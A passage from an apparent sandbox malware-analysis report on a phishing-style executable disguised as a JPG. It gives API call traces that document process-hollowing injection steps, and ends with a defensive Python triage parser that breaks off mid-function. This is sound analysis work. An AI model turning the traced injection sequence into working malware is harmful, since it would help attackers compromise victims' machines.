  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 9
  • API ID: HeapFreeStrStrI
  • String ID: pnls
  • API String ID: 4137399961-141991303
  • Opcode ID: 4aa7b909af106ac1487055971ad23c5d9ff314578936fa2f1abc21ea428e854d
  • Instruction ID: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
  • Opcode Fuzzy Hash: E6D095824D6F9B47C9517014971DE702580FF430D3D9B726405C1434515F00301F1D1D
  • Instruction Fuzzy Hash: a541ced8c8c75d727343971dda9e244897b1605c7a85f4116a33065e88e68885
APIs
    • Part of subcall function 002E47D3: memcpy.NTDLL(00000004,?,?,?,00000000), ref: 002E48C3
  • HeapFree.KERNEL32(00000000,?,?), ref: 002E14BE
    • Part of subcall function 002E3D12: GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C), ref: 002E3D27
    • Part of subcall function 002E3D12: GetSystemDefaultUILanguage.KERNEL32(?,?,002E1499,?,002E7494,pnls,00000000,002E618C,0000000C,?,?,?,002E1800,00000000,?,002E7494), ref: 002E3D31
  • StrStrIA.SHLWAPI(00000000,002E7494), ref: 002E14A4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:3F602782259014F0253ECDEDFEF4D261
Total matches:37
Initial Analysis Report:Open
Initial sample Analysis ID:68262
Initial sample SHA 256:3CCBE128847999E971BF2194D595C7D211A4EB32C8BD53401702A83B3AB73B70
Initial sample name:27Scansione_F24_2018_07.JPG.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
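The entries above give the raw material of an injection triage: CreateProcessA at ref 002E13EE with dwCreationFlags 04000004, NtUnmapViewOfSection, NtAllocateVirtualMemory with protection 00000040, NtWriteVirtualMemory, NtSetContextThread, ResumeThread, OpenProcess with access mask 0010047A and NtCreateSection. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it parses API lines in exactly the format printed above, decodes the flag arguments and reports which process-hollowing stages occur. The TRACE lines are copied from the entries above; the stage names, the argument indices and the all-stages rule are this example's own.

```python
"""Parse and triage API-call lists in the format this report prints.

Added example; not part of the Joe Sandbox report and not code from the
sample. It parses "APIs" lines, decodes the arguments that matter for
injection triage (CreateProcess dwCreationFlags, OpenProcess/NtOpenProcess
access masks, allocation and section page protections) and reports which
process-hollowing stages are present. TRACE copies lines from the entries
above; stage names, argument indices and the rule are this example's own.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple, Union

CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x10: "CREATE_NEW_CONSOLE", 0x400: "CREATE_UNICODE_ENVIRONMENT",
                  0x04000000: "CREATE_DEFAULT_ERROR_MODE", 0x08000000: "CREATE_NO_WINDOW"}
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                  0x400: "PROCESS_QUERY_INFORMATION", 0x800: "PROCESS_SUSPEND_RESUME", 0x100000: "SYNCHRONIZE"}
PAGE_PROTECT = {0x2: "PAGE_READONLY", 0x4: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
DECODE: Dict[str, Tuple[int, Dict[int, str]]] = {  # API -> (argument index per documented prototype, flag table)
    "CreateProcessA": (5, CREATION_FLAGS), "CreateProcessW": (5, CREATION_FLAGS),
    "OpenProcess": (0, PROCESS_ACCESS), "NtOpenProcess": (1, PROCESS_ACCESS),
    "NtAllocateVirtualMemory": (5, PAGE_PROTECT), "VirtualAllocEx": (4, PAGE_PROTECT),
    "NtCreateSection": (4, PAGE_PROTECT), "NtMapViewOfSection": (9, PAGE_PROTECT),
}
STAGE_APIS = {"NtUnmapViewOfSection": "section_swap", "NtMapViewOfSection": "section_swap",
              "NtWriteVirtualMemory": "remote_write", "WriteProcessMemory": "remote_write",
              "NtSetContextThread": "context_change", "SetThreadContext": "context_change",
              "ResumeThread": "resume", "NtResumeThread": "resume"}
LINE_RE = re.compile(r"(?:Part of subcall function (?P<caller>[0-9A-F]+): )?(?P<api>\w+)\.\w+"
                     r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")
TRACE = """\
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • GetLastError.KERNEL32 ref: 00401026
"""

@dataclass
class Call:
    api: str
    ref: int
    caller: Optional[int]  # set on "Part of subcall function" lines
    args: List[Union[int, str, None]] = field(default_factory=list)

def parse_trace(text: str) -> List[Call]:
    """'?' becomes None, hex becomes int, anything else (a string argument) stays text."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        args: List[Union[int, str, None]] = []
        for tok in (m["args"].split(",") if m["args"] else []):
            try:
                args.append(None if tok == "?" else int(tok, 16))
            except ValueError:
                args.append(tok)
        calls.append(Call(m["api"], int(m["ref"], 16), int(m["caller"], 16) if m["caller"] else None, args))
    return calls

def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
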